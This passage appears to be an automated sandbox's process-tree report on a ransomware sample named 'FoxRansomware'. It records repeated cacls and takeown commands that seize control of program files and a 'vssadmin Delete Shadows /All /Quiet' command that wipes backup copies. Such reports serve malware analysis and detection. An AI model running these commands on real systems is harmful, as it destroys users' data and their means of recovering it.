                                      uSDT8H9y.exe -accepteula "FreeCellMCE.png" -nobanner
                                      4⤵
                                      • Executes dropped EXE
                                      PID:2528
                                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                    uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                    3⤵
                                    • Executes dropped EXE
                                    PID:2952
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
                                  2⤵
                                  • Loads dropped DLL
                                  PID:3520
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
                                    3⤵
                                      PID:3684
                                    • C:\Windows\SysWOW64\takeown.exe
                                      takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
                                      3⤵
                                      • Modifies file permissions
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3780
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "HeartsMCE.png" -nobanner
                                      3⤵
                                      • Loads dropped DLL
                                      PID:3776
                                      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                        uSDT8H9y.exe -accepteula "HeartsMCE.png" -nobanner
                                        4⤵
                                        • Executes dropped EXE
                                        PID:3800
                                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                      3⤵
                                      • Executes dropped EXE
                                      PID:2740
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
                                    2⤵
                                    • Loads dropped DLL
                                    PID:2424
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
                                      3⤵
                                        PID:1496
                                      • C:\Windows\SysWOW64\takeown.exe
                                        takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
                                        3⤵
                                        • Modifies file permissions
                                        PID:1704
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "eula.ini" -nobanner
                                        3⤵
                                        • Loads dropped DLL
                                        PID:328
                                        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                          uSDT8H9y.exe -accepteula "eula.ini" -nobanner
                                          4⤵
                                          • Executes dropped EXE
                                          PID:1680
                                      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                        uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                        3⤵
                                        • Executes dropped EXE
                                        PID:2680
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
                                      2⤵
                                      • Loads dropped DLL
                                      PID:544
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
                                        3⤵
                                          PID:4060
                                        • C:\Windows\SysWOW64\takeown.exe
                                          takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
                                          3⤵
                                          • Modifies file permissions
                                          PID:1692
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "AcroSign.prc" -nobanner
                                          3⤵
                                          • Loads dropped DLL
                                          PID:756
                                          • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                            uSDT8H9y.exe -accepteula "AcroSign.prc" -nobanner
                                            4⤵
                                            • Executes dropped EXE
                                            PID:2856
                                        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                          uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                          3⤵
                                          • Executes dropped EXE
                                          PID:3140
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
                                        2⤵
                                        • Loads dropped DLL
                                        PID:3872
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
                                          3⤵
                                            PID:3176
                                          • C:\Windows\SysWOW64\takeown.exe
                                            takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
                                            3⤵
                                            • Modifies file permissions
                                            PID:1568
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "forms_distributed.gif" -nobanner
                                            3⤵
                                            • Loads dropped DLL
                                            PID:3064
                                            • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                              uSDT8H9y.exe -accepteula "forms_distributed.gif" -nobanner
                                              4⤵
                                              • Executes dropped EXE
                                              PID:3220
                                          • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                            uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                            3⤵
                                            • Executes dropped EXE
                                            PID:2152
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
                                          2⤵
                                          • Loads dropped DLL
                                          PID:3272
                                          • C:\Windows\SysWOW64\cacls.exe
                                            cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
                                            3⤵
                                              PID:2708
                                            • C:\Windows\SysWOW64\takeown.exe
                                              takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
                                              3⤵
                                              • Modifies file permissions
                                              PID:2372
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "reviews_sent.gif" -nobanner
                                              3⤵
                                              • Loads dropped DLL
                                              PID:1608
                                              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                uSDT8H9y.exe -accepteula "reviews_sent.gif" -nobanner
                                                4⤵
                                                • Executes dropped EXE
                                                PID:3036
                                            • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                              uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                              3⤵
                                              • Executes dropped EXE
                                              PID:3452
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
                                            2⤵
                                            • Loads dropped DLL
                                            PID:868
                                            • C:\Windows\SysWOW64\cacls.exe
                                              cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
                                              3⤵
                                                PID:3548
                                              • C:\Windows\SysWOW64\takeown.exe
                                                takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
                                                3⤵
                                                • Modifies file permissions
                                                PID:3560
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "stop_collection_data.gif" -nobanner
                                                3⤵
                                                • Loads dropped DLL
                                                PID:3592
                                                • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                  uSDT8H9y.exe -accepteula "stop_collection_data.gif" -nobanner
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:3376
                                              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                3⤵
                                                • Executes dropped EXE
                                                PID:3664
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""
                                              2⤵
                                              • Loads dropped DLL
                                              PID:1592
                                              • C:\Windows\SysWOW64\cacls.exe
                                                cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C
                                                3⤵
                                                  PID:832
                                                • C:\Windows\SysWOW64\takeown.exe
                                                  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"
                                                  3⤵
                                                  • Modifies file permissions
                                                  PID:344
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ReadMe.htm" -nobanner
                                                  3⤵
                                                  • Loads dropped DLL
                                                  PID:2244
                                                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                    uSDT8H9y.exe -accepteula "ReadMe.htm" -nobanner
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:3416
                                                • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                  uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:1212
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
                                                2⤵
                                                • Loads dropped DLL
                                                PID:3692
                                                • C:\Windows\SysWOW64\cacls.exe
                                                  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
                                                  3⤵
                                                    PID:1196
                                                  • C:\Windows\SysWOW64\takeown.exe
                                                    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
                                                    3⤵
                                                    • Modifies file permissions
                                                    PID:3672
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "MinionPro-It.otf" -nobanner
                                                    3⤵
                                                    • Loads dropped DLL
                                                    PID:2764
                                                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                      uSDT8H9y.exe -accepteula "MinionPro-It.otf" -nobanner
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:2912
                                                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                    uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:3644
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:268
                                                  • C:\Windows\SysWOW64\cacls.exe
                                                    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
                                                    3⤵
                                                      PID:2820
                                                    • C:\Windows\SysWOW64\takeown.exe
                                                      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
                                                      3⤵
                                                      • Modifies file permissions
                                                      PID:3244
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ZX______.PFB" -nobanner
                                                      3⤵
                                                      • Loads dropped DLL
                                                      PID:2740
                                                      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                        uSDT8H9y.exe -accepteula "ZX______.PFB" -nobanner
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:4028
                                                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:3184
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
                                                    2⤵
                                                    • Loads dropped DLL
                                                    PID:3164
                                                    • C:\Windows\SysWOW64\cacls.exe
                                                      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
                                                      3⤵
                                                        PID:3268
                                                      • C:\Windows\SysWOW64\takeown.exe
                                                        takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
                                                        3⤵
                                                        • Modifies file permissions
                                                        PID:748
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "brt04.hsp" -nobanner
                                                        3⤵
                                                        • Loads dropped DLL
                                                        PID:616
                                                        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                          uSDT8H9y.exe -accepteula "brt04.hsp" -nobanner
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:1756
                                                      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                        uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:1560
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
                                                      2⤵
                                                      • Loads dropped DLL
                                                      PID:3568
                                                      • C:\Windows\SysWOW64\cacls.exe
                                                        cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
                                                        3⤵
                                                          PID:2184
                                                        • C:\Windows\SysWOW64\takeown.exe
                                                          takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
                                                          3⤵
                                                          • Modifies file permissions
                                                          PID:3288
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "engphon.env" -nobanner
                                                          3⤵
                                                          • Loads dropped DLL
                                                          PID:2964
                                                          • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                            uSDT8H9y.exe -accepteula "engphon.env" -nobanner
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:3448
                                                        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                          uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:3648
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
                                                        2⤵
                                                        • Loads dropped DLL
                                                        PID:952
                                                        • C:\Windows\SysWOW64\cacls.exe
                                                          cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
                                                          3⤵
                                                            PID:3296
                                                          • C:\Windows\SysWOW64\takeown.exe
                                                            takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
                                                            3⤵
                                                            • Modifies file permissions
                                                            PID:1624
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "CORPCHAR.TXT" -nobanner
                                                            3⤵
                                                            • Loads dropped DLL
                                                            PID:2888
                                                            • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                              uSDT8H9y.exe -accepteula "CORPCHAR.TXT" -nobanner
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:3048
                                                          • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                            uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:2640
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
                                                          2⤵
                                                          • Loads dropped DLL
                                                          PID:548
                                                          • C:\Windows\SysWOW64\cacls.exe
                                                            cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
                                                            3⤵
                                                              PID:1940
                                                            • C:\Windows\SysWOW64\takeown.exe
                                                              takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
                                                              3⤵
                                                              • Modifies file permissions
                                                              PID:616
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "CP1250.TXT" -nobanner
                                                              3⤵
                                                              • Loads dropped DLL
                                                              PID:2624
                                                              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                uSDT8H9y.exe -accepteula "CP1250.TXT" -nobanner
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:2428
                                                            • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                              uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:664
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
                                                            2⤵
                                                            • Loads dropped DLL
                                                            PID:3432
                                                            • C:\Windows\SysWOW64\cacls.exe
                                                              cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
                                                              3⤵
                                                                PID:3820
                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
                                                                3⤵
                                                                • Modifies file permissions
                                                                PID:3728
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "LogTransport2.exe" -nobanner
                                                                3⤵
                                                                • Loads dropped DLL
                                                                PID:3832
                                                                • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                  uSDT8H9y.exe -accepteula "LogTransport2.exe" -nobanner
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:1708
                                                              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                                3⤵
                                                                • Executes dropped EXE
                                                                PID:1732
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
                                                              2⤵
                                                              • Loads dropped DLL
                                                              PID:2788
                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
                                                                3⤵
                                                                  PID:1964
                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
                                                                  3⤵
                                                                  • Modifies file permissions
                                                                  PID:3212
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "bl.gif" -nobanner
                                                                  3⤵
                                                                  • Loads dropped DLL
                                                                  PID:3724
                                                                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                    uSDT8H9y.exe -accepteula "bl.gif" -nobanner
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:3616
                                                                • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                  uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:2688
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
                                                                2⤵
                                                                • Loads dropped DLL
                                                                PID:4020
                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
                                                                  3⤵
                                                                  • Modifies file permissions
                                                                  PID:2388
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "forms_super.gif" -nobanner
                                                                  3⤵
                                                                  • Loads dropped DLL
                                                                  PID:1208
                                                                • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                  uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:2260
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
                                                                2⤵
                                                                • Loads dropped DLL
                                                                PID:3604
                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                  cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
                                                                  3⤵
                                                                    PID:860
                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
                                                                    3⤵
                                                                    • Modifies file permissions
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:616
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "resource.xml" -nobanner
                                                                    3⤵
                                                                    • Loads dropped DLL
                                                                    PID:876
                                                                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                      uSDT8H9y.exe -accepteula "resource.xml" -nobanner
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:3684
                                                                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                    uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:576
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
                                                                  2⤵
                                                                  • Loads dropped DLL
                                                                  PID:2452
                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
                                                                    3⤵
                                                                      PID:2560
                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
                                                                      3⤵
                                                                      • Modifies file permissions
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2984
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "resource.xml" -nobanner
                                                                      3⤵
                                                                      • Loads dropped DLL
                                                                      PID:2972
                                                                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:3412
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
                                                                    2⤵
                                                                    • Loads dropped DLL
                                                                    PID:2068
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
                                                                      3⤵
                                                                        PID:3892
                                                                      • C:\Windows\SysWOW64\takeown.exe
                                                                        takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
                                                                        3⤵
                                                                        • Modifies file permissions
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:548
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "MahjongMCE.png" -nobanner
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        PID:3184
                                                                        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                          uSDT8H9y.exe -accepteula "MahjongMCE.png" -nobanner
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:1568
                                                                      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                        uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:4032
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
                                                                      2⤵
                                                                      • Loads dropped DLL
                                                                      PID:2060
                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                        cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
                                                                        3⤵
                                                                          PID:2388
                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                          takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
                                                                          3⤵
                                                                          • Modifies file permissions
                                                                          PID:3616
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "review_browser.gif" -nobanner
                                                                          3⤵
                                                                          • Loads dropped DLL
                                                                          PID:300
                                                                        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                                                          uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:2788
                                                                    • C:\Windows\system32\taskeng.exe
                                                                      taskeng.exe {8CEE9AA9-CDB6-4C68-9D55-C293650D091F} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]
                                                                      1⤵
                                                                        PID:3356
                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                          C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat"
                                                                          2⤵
                                                                            PID:3480
                                                                            • C:\Windows\system32\vssadmin.exe
                                                                              vssadmin Delete Shadows /All /Quiet
                                                                              3⤵
                                                                              • Interacts with shadow copies
                                                                              PID:3992
                                                                        • C:\Windows\system32\vssvc.exe
                                                                          C:\Windows\system32\vssvc.exe
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1604
                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                          cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
                                                                          1⤵
                                                                            PID:1996
                                                                          • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
